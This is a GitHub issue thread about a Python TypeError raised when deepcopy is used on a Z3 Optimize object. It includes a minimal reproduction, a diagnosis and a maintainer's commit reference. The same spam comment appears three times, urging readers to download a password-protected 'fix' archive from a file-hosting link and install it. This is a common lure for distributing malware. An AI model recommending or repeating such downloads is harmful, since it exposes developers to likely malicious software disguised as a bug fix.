### ISSUE TITLE
Python Error on Optimize deepcopy

### ISSUE THREAD

**Issue by colobrodo** [Z3Prover/z3#7355]
When I try to use `deepcopy` (from `copy` python module) on an `Optimize` instance it fails, even if the deepcopy methos is listed in the documentation

This is the error that I got
`TypeError: Optimize.__init__() takes from 1 to 2 positional arguments but 3 were given`

This is a minimal example to reproduce it

```python
from z3 import *
from copy import deepcopy
opt = Optimize()
opt2 = deepcopy(opt)
```

Looking at the code I can see that the problem is on the `__deepcopy__` method of `Optimize` (line 7936 of  `src/api/python/z3/z3.py`) it calls the constructor passing two arguments, one for `ctx` and one for `optimize` but only the one for ctx is specified by the constructor.

It's enough to add another parameter that defaults to `None` and use like for `ctx`?

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikolajBjorner** [comment]
99a9a4af0..0ba306e7b
